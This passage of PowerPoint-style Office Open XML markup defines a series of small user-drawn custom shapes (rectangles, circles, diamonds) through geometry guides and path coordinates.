                    <a:gd name="T13" fmla="*/ 60 h 61"/>
                    <a:gd name="T14" fmla="*/ 58 w 58"/>
                    <a:gd name="T15" fmla="*/ 2 h 61"/>
                    <a:gd name="T16" fmla="*/ 1 w 58"/>
                    <a:gd name="T17" fmla="*/ 2 h 61"/>
                    <a:gd name="T18" fmla="*/ 1 w 58"/>
                    <a:gd name="T19"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61">
                      <a:moveTo>
                        <a:pt x="58" y="61"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="61"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="61"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1" y="60"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="58" y="60"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="58" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1"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215"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9540875" y="4724401"/>
                  <a:ext cx="39688" cy="41275"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 25 w 25"/>
                    <a:gd name="T1" fmla="*/ 26 h 26"/>
                    <a:gd name="T2" fmla="*/ 0 w 25"/>
                    <a:gd name="T3" fmla="*/ 26 h 26"/>
                    <a:gd name="T4" fmla="*/ 0 w 25"/>
                    <a:gd name="T5" fmla="*/ 0 h 26"/>
                    <a:gd name="T6" fmla="*/ 25 w 25"/>
                    <a:gd name="T7" fmla="*/ 0 h 26"/>
                    <a:gd name="T8" fmla="*/ 25 w 25"/>
                    <a:gd name="T9" fmla="*/ 26 h 26"/>
                    <a:gd name="T10" fmla="*/ 2 w 25"/>
                    <a:gd name="T11" fmla="*/ 25 h 26"/>
                    <a:gd name="T12" fmla="*/ 24 w 25"/>
                    <a:gd name="T13" fmla="*/ 25 h 26"/>
                    <a:gd name="T14" fmla="*/ 24 w 25"/>
                    <a:gd name="T15" fmla="*/ 1 h 26"/>
                    <a:gd name="T16" fmla="*/ 2 w 25"/>
                    <a:gd name="T17" fmla="*/ 1 h 26"/>
                    <a:gd name="T18" fmla="*/ 2 w 25"/>
                    <a:gd name="T19"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6">
                      <a:moveTo>
                        <a:pt x="25" y="26"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="26"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2" y="25"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="24" y="25"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="1"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="1"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2"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216"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9531350" y="4716463"/>
                  <a:ext cx="55563" cy="55563"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 24"/>
                    <a:gd name="T1" fmla="*/ 24 h 24"/>
                    <a:gd name="T2" fmla="*/ 0 w 24"/>
                    <a:gd name="T3" fmla="*/ 12 h 24"/>
                    <a:gd name="T4" fmla="*/ 12 w 24"/>
                    <a:gd name="T5" fmla="*/ 0 h 24"/>
                    <a:gd name="T6" fmla="*/ 24 w 24"/>
                    <a:gd name="T7" fmla="*/ 12 h 24"/>
                    <a:gd name="T8" fmla="*/ 12 w 24"/>
                    <a:gd name="T9" fmla="*/ 24 h 24"/>
                    <a:gd name="T10" fmla="*/ 12 w 24"/>
                    <a:gd name="T11" fmla="*/ 1 h 24"/>
                    <a:gd name="T12" fmla="*/ 1 w 24"/>
                    <a:gd name="T13" fmla="*/ 12 h 24"/>
                    <a:gd name="T14" fmla="*/ 12 w 24"/>
                    <a:gd name="T15" fmla="*/ 23 h 24"/>
                    <a:gd name="T16" fmla="*/ 23 w 24"/>
                    <a:gd name="T17" fmla="*/ 12 h 24"/>
                    <a:gd name="T18" fmla="*/ 12 w 24"/>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6" y="24"/>
                        <a:pt x="0" y="19"/>
                        <a:pt x="0" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="5"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="12" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="0"/>
                        <a:pt x="24" y="5"/>
                        <a:pt x="24" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24" y="19"/>
                        <a:pt x="19" y="24"/>
                        <a:pt x="12" y="24"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="12" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="1"/>
                        <a:pt x="1" y="6"/>
                        <a:pt x="1" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="18"/>
                        <a:pt x="6" y="23"/>
                        <a:pt x="12" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="23"/>
                        <a:pt x="23" y="18"/>
                        <a:pt x="23" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="6"/>
                        <a:pt x="18" y="1"/>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217"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9525000" y="4710113"/>
                  <a:ext cx="69850" cy="69850"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 15 w 30"/>
                    <a:gd name="T1" fmla="*/ 30 h 30"/>
                    <a:gd name="T2" fmla="*/ 0 w 30"/>
                    <a:gd name="T3" fmla="*/ 15 h 30"/>
                    <a:gd name="T4" fmla="*/ 15 w 30"/>
                    <a:gd name="T5" fmla="*/ 0 h 30"/>
                    <a:gd name="T6" fmla="*/ 30 w 30"/>
                    <a:gd name="T7" fmla="*/ 15 h 30"/>
                    <a:gd name="T8" fmla="*/ 15 w 30"/>
                    <a:gd name="T9" fmla="*/ 30 h 30"/>
                    <a:gd name="T10" fmla="*/ 15 w 30"/>
                    <a:gd name="T11" fmla="*/ 1 h 30"/>
                    <a:gd name="T12" fmla="*/ 1 w 30"/>
                    <a:gd name="T13" fmla="*/ 15 h 30"/>
                    <a:gd name="T14" fmla="*/ 15 w 30"/>
                    <a:gd name="T15" fmla="*/ 29 h 30"/>
                    <a:gd name="T16" fmla="*/ 29 w 30"/>
                    <a:gd name="T17" fmla="*/ 15 h 30"/>
                    <a:gd name="T18" fmla="*/ 15 w 30"/>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30"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="30"/>
                        <a:pt x="0" y="23"/>
                        <a:pt x="0" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="15" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="0"/>
                        <a:pt x="30" y="7"/>
                        <a:pt x="30" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="23"/>
                        <a:pt x="23" y="30"/>
                        <a:pt x="15" y="30"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="15" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="23"/>
                        <a:pt x="7" y="29"/>
                        <a:pt x="15" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="29"/>
                        <a:pt x="29" y="23"/>
                        <a:pt x="29" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="7"/>
                        <a:pt x="23" y="1"/>
                        <a:pt x="1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218"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9632950" y="4711701"/>
                  <a:ext cx="65088" cy="65088"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 21 w 41"/>
                    <a:gd name="T1" fmla="*/ 41 h 41"/>
                    <a:gd name="T2" fmla="*/ 0 w 41"/>
                    <a:gd name="T3" fmla="*/ 21 h 41"/>
                    <a:gd name="T4" fmla="*/ 22 w 41"/>
                    <a:gd name="T5" fmla="*/ 0 h 41"/>
                    <a:gd name="T6" fmla="*/ 41 w 41"/>
                    <a:gd name="T7" fmla="*/ 21 h 41"/>
                    <a:gd name="T8" fmla="*/ 21 w 41"/>
                    <a:gd name="T9" fmla="*/ 41 h 41"/>
                    <a:gd name="T10" fmla="*/ 2 w 41"/>
                    <a:gd name="T11" fmla="*/ 21 h 41"/>
                    <a:gd name="T12" fmla="*/ 21 w 41"/>
                    <a:gd name="T13" fmla="*/ 40 h 41"/>
                    <a:gd name="T14" fmla="*/ 40 w 41"/>
                    <a:gd name="T15" fmla="*/ 21 h 41"/>
                    <a:gd name="T16" fmla="*/ 22 w 41"/>
                    <a:gd name="T17" fmla="*/ 2 h 41"/>
                    <a:gd name="T18" fmla="*/ 2 w 41"/>
                    <a:gd name="T19"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41">
                      <a:moveTo>
                        <a:pt x="21" y="41"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="41" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="41"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="2" y="21"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="21" y="40"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2"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19"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9645650" y="4721226"/>
                  <a:ext cx="42863" cy="46038"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 9 w 19"/>
                    <a:gd name="T1" fmla="*/ 20 h 20"/>
                    <a:gd name="T2" fmla="*/ 0 w 19"/>
                    <a:gd name="T3" fmla="*/ 10 h 20"/>
                    <a:gd name="T4" fmla="*/ 9 w 19"/>
                    <a:gd name="T5" fmla="*/ 0 h 20"/>
                    <a:gd name="T6" fmla="*/ 19 w 19"/>
                    <a:gd name="T7" fmla="*/ 10 h 20"/>
                    <a:gd name="T8" fmla="*/ 9 w 19"/>
                    <a:gd name="T9" fmla="*/ 20 h 20"/>
                    <a:gd name="T10" fmla="*/ 9 w 19"/>
                    <a:gd name="T11" fmla="*/ 1 h 20"/>
                    <a:gd name="T12" fmla="*/ 0 w 19"/>
                    <a:gd name="T13" fmla="*/ 10 h 20"/>
                    <a:gd name="T14" fmla="*/ 9 w 19"/>
                    <a:gd name="T15" fmla="*/ 19 h 20"/>
                    <a:gd name="T16" fmla="*/ 18 w 19"/>
                    <a:gd name="T17" fmla="*/ 10 h 20"/>
                    <a:gd name="T18" fmla="*/ 9 w 19"/>
                    <a:gd name="T19"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0">
                      <a:moveTo>
                        <a:pt x="9" y="20"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="20"/>
                        <a:pt x="0" y="15"/>
                        <a:pt x="0" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="5"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="9" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="0"/>
                        <a:pt x="19" y="5"/>
                        <a:pt x="19" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="15"/>
                        <a:pt x="15" y="20"/>
                        <a:pt x="9" y="20"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="9" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
                        <a:pt x="0" y="5"/>
                        <a:pt x="0" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="15"/>
                        <a:pt x="4" y="19"/>
                        <a:pt x="9" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="19"/>
                        <a:pt x="18" y="15"/>
                        <a:pt x="18" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="5"/>
                        <a:pt x="14" y="1"/>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20"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9631363" y="4710113"/>
                  <a:ext cx="69850" cy="69850"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 15 w 30"/>
                    <a:gd name="T1" fmla="*/ 30 h 30"/>
                    <a:gd name="T2" fmla="*/ 0 w 30"/>
                    <a:gd name="T3" fmla="*/ 15 h 30"/>
                    <a:gd name="T4" fmla="*/ 15 w 30"/>
                    <a:gd name="T5" fmla="*/ 0 h 30"/>
                    <a:gd name="T6" fmla="*/ 30 w 30"/>
                    <a:gd name="T7" fmla="*/ 15 h 30"/>
                    <a:gd name="T8" fmla="*/ 15 w 30"/>
                    <a:gd name="T9" fmla="*/ 30 h 30"/>
                    <a:gd name="T10" fmla="*/ 15 w 30"/>
                    <a:gd name="T11" fmla="*/ 1 h 30"/>
                    <a:gd name="T12" fmla="*/ 1 w 30"/>
                    <a:gd name="T13" fmla="*/ 15 h 30"/>
                    <a:gd name="T14" fmla="*/ 15 w 30"/>
                    <a:gd name="T15" fmla="*/ 29 h 30"/>
                    <a:gd name="T16" fmla="*/ 29 w 30"/>
                    <a:gd name="T17" fmla="*/ 15 h 30"/>
                    <a:gd name="T18" fmla="*/ 15 w 30"/>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30"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="30"/>
                        <a:pt x="0" y="23"/>
                        <a:pt x="0" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="15" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="0"/>
                        <a:pt x="30" y="7"/>
                        <a:pt x="30" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="23"/>
                        <a:pt x="23" y="30"/>
                        <a:pt x="15" y="30"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="15" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="23"/>
                        <a:pt x="7" y="29"/>
                        <a:pt x="15" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="29"/>
                        <a:pt x="29" y="23"/>
                        <a:pt x="29" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="7"/>
                        <a:pt x="23" y="1"/>
                        <a:pt x="1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1"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9305925" y="4819651"/>
                  <a:ext cx="82550" cy="80963"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 18 w 36"/>
                    <a:gd name="T1" fmla="*/ 35 h 35"/>
                    <a:gd name="T2" fmla="*/ 0 w 36"/>
                    <a:gd name="T3" fmla="*/ 18 h 35"/>
                    <a:gd name="T4" fmla="*/ 18 w 36"/>
                    <a:gd name="T5" fmla="*/ 0 h 35"/>
                    <a:gd name="T6" fmla="*/ 36 w 36"/>
                    <a:gd name="T7" fmla="*/ 18 h 35"/>
                    <a:gd name="T8" fmla="*/ 18 w 36"/>
                    <a:gd name="T9" fmla="*/ 35 h 35"/>
                    <a:gd name="T10" fmla="*/ 18 w 36"/>
                    <a:gd name="T11" fmla="*/ 1 h 35"/>
                    <a:gd name="T12" fmla="*/ 1 w 36"/>
                    <a:gd name="T13" fmla="*/ 18 h 35"/>
                    <a:gd name="T14" fmla="*/ 18 w 36"/>
                    <a:gd name="T15" fmla="*/ 34 h 35"/>
                    <a:gd name="T16" fmla="*/ 35 w 36"/>
                    <a:gd name="T17" fmla="*/ 18 h 35"/>
                    <a:gd name="T18" fmla="*/ 18 w 36"/>
                    <a:gd name="T19"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5">
                      <a:moveTo>
                        <a:pt x="18" y="35"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="35"/>
                        <a:pt x="0" y="27"/>
                        <a:pt x="0" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="8"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="18" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="0"/>
                        <a:pt x="36" y="8"/>
                        <a:pt x="36" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="27"/>
                        <a:pt x="28" y="35"/>
                        <a:pt x="18" y="35"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="18" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="1"/>
                        <a:pt x="1" y="8"/>
                        <a:pt x="1" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="27"/>
                        <a:pt x="9" y="34"/>
                        <a:pt x="18" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="34"/>
                        <a:pt x="35" y="27"/>
                        <a:pt x="35" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="8"/>
                        <a:pt x="27" y="1"/>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2"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9328150" y="4840288"/>
                  <a:ext cx="39688" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 17"/>
                    <a:gd name="T1" fmla="*/ 17 h 17"/>
                    <a:gd name="T2" fmla="*/ 0 w 17"/>
                    <a:gd name="T3" fmla="*/ 9 h 17"/>
                    <a:gd name="T4" fmla="*/ 8 w 17"/>
                    <a:gd name="T5" fmla="*/ 0 h 17"/>
                    <a:gd name="T6" fmla="*/ 17 w 17"/>
                    <a:gd name="T7" fmla="*/ 9 h 17"/>
                    <a:gd name="T8" fmla="*/ 8 w 17"/>
                    <a:gd name="T9" fmla="*/ 17 h 17"/>
                    <a:gd name="T10" fmla="*/ 8 w 17"/>
                    <a:gd name="T11" fmla="*/ 1 h 17"/>
                    <a:gd name="T12" fmla="*/ 1 w 17"/>
                    <a:gd name="T13" fmla="*/ 9 h 17"/>
                    <a:gd name="T14" fmla="*/ 8 w 17"/>
                    <a:gd name="T15" fmla="*/ 16 h 17"/>
                    <a:gd name="T16" fmla="*/ 16 w 17"/>
                    <a:gd name="T17" fmla="*/ 9 h 17"/>
                    <a:gd name="T18" fmla="*/ 8 w 17"/>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8" y="17"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="17"/>
                        <a:pt x="0" y="13"/>
                        <a:pt x="0" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="4"/>
                        <a:pt x="3" y="0"/>
                        <a:pt x="8" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="0"/>
                        <a:pt x="17" y="4"/>
                        <a:pt x="17" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="13"/>
                        <a:pt x="13" y="17"/>
                        <a:pt x="8" y="17"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="8" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="1"/>
                        <a:pt x="1" y="4"/>
                        <a:pt x="1" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="4" y="16"/>
                        <a:pt x="8" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="16"/>
                        <a:pt x="16" y="13"/>
                        <a:pt x="16" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="4"/>
                        <a:pt x="12" y="1"/>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3"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9412288" y="4819651"/>
                  <a:ext cx="82550" cy="80963"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 18 w 36"/>
                    <a:gd name="T1" fmla="*/ 35 h 35"/>
                    <a:gd name="T2" fmla="*/ 0 w 36"/>
                    <a:gd name="T3" fmla="*/ 18 h 35"/>
                    <a:gd name="T4" fmla="*/ 18 w 36"/>
                    <a:gd name="T5" fmla="*/ 0 h 35"/>
                    <a:gd name="T6" fmla="*/ 36 w 36"/>
                    <a:gd name="T7" fmla="*/ 18 h 35"/>
                    <a:gd name="T8" fmla="*/ 18 w 36"/>
                    <a:gd name="T9" fmla="*/ 35 h 35"/>
                    <a:gd name="T10" fmla="*/ 18 w 36"/>
                    <a:gd name="T11" fmla="*/ 1 h 35"/>
                    <a:gd name="T12" fmla="*/ 1 w 36"/>
                    <a:gd name="T13" fmla="*/ 18 h 35"/>
                    <a:gd name="T14" fmla="*/ 18 w 36"/>
                    <a:gd name="T15" fmla="*/ 34 h 35"/>
                    <a:gd name="T16" fmla="*/ 35 w 36"/>
                    <a:gd name="T17" fmla="*/ 18 h 35"/>
                    <a:gd name="T18" fmla="*/ 18 w 36"/>
                    <a:gd name="T19"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5">
                      <a:moveTo>
                        <a:pt x="18" y="35"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="35"/>
                        <a:pt x="0" y="27"/>
                        <a:pt x="0" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="8"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="18" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="0"/>
                        <a:pt x="36" y="8"/>
                        <a:pt x="36" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="27"/>
                        <a:pt x="28" y="35"/>
                        <a:pt x="18" y="35"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="18" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="1"/>
                        <a:pt x="1" y="8"/>
                        <a:pt x="1" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="27"/>
                        <a:pt x="9" y="34"/>
                        <a:pt x="18" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="34"/>
                        <a:pt x="35" y="27"/>
                        <a:pt x="35" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="8"/>
                        <a:pt x="27" y="1"/>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24"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9418638" y="4826001"/>
                  <a:ext cx="69850" cy="66675"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 15 w 30"/>
                    <a:gd name="T1" fmla="*/ 29 h 29"/>
                    <a:gd name="T2" fmla="*/ 0 w 30"/>
                    <a:gd name="T3" fmla="*/ 15 h 29"/>
                    <a:gd name="T4" fmla="*/ 15 w 30"/>
                    <a:gd name="T5" fmla="*/ 0 h 29"/>
                    <a:gd name="T6" fmla="*/ 30 w 30"/>
                    <a:gd name="T7" fmla="*/ 15 h 29"/>
                    <a:gd name="T8" fmla="*/ 15 w 30"/>
                    <a:gd name="T9" fmla="*/ 29 h 29"/>
                    <a:gd name="T10" fmla="*/ 15 w 30"/>
                    <a:gd name="T11" fmla="*/ 0 h 29"/>
                    <a:gd name="T12" fmla="*/ 1 w 30"/>
                    <a:gd name="T13" fmla="*/ 15 h 29"/>
                    <a:gd name="T14" fmla="*/ 15 w 30"/>
                    <a:gd name="T15" fmla="*/ 29 h 29"/>
                    <a:gd name="T16" fmla="*/ 29 w 30"/>
                    <a:gd name="T17" fmla="*/ 15 h 29"/>
                    <a:gd name="T18" fmla="*/ 15 w 30"/>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9">
                      <a:moveTo>
                        <a:pt x="15" y="29"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="29"/>
                        <a:pt x="0" y="23"/>
                        <a:pt x="0" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="15" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="0"/>
                        <a:pt x="30" y="6"/>
                        <a:pt x="30" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="23"/>
                        <a:pt x="23" y="29"/>
                        <a:pt x="15" y="29"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="15" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="22"/>
                        <a:pt x="7" y="29"/>
                        <a:pt x="15" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="29"/>
                        <a:pt x="29" y="22"/>
                        <a:pt x="29" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="7"/>
                        <a:pt x="23"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25"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9404350" y="4857751"/>
                  <a:ext cx="98425" cy="49213"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2 w 62"/>
                    <a:gd name="T1" fmla="*/ 31 h 31"/>
                    <a:gd name="T2" fmla="*/ 0 w 62"/>
                    <a:gd name="T3" fmla="*/ 29 h 31"/>
                    <a:gd name="T4" fmla="*/ 31 w 62"/>
                    <a:gd name="T5" fmla="*/ 0 h 31"/>
                    <a:gd name="T6" fmla="*/ 31 w 62"/>
                    <a:gd name="T7" fmla="*/ 0 h 31"/>
                    <a:gd name="T8" fmla="*/ 62 w 62"/>
                    <a:gd name="T9" fmla="*/ 29 h 31"/>
                    <a:gd name="T10" fmla="*/ 60 w 62"/>
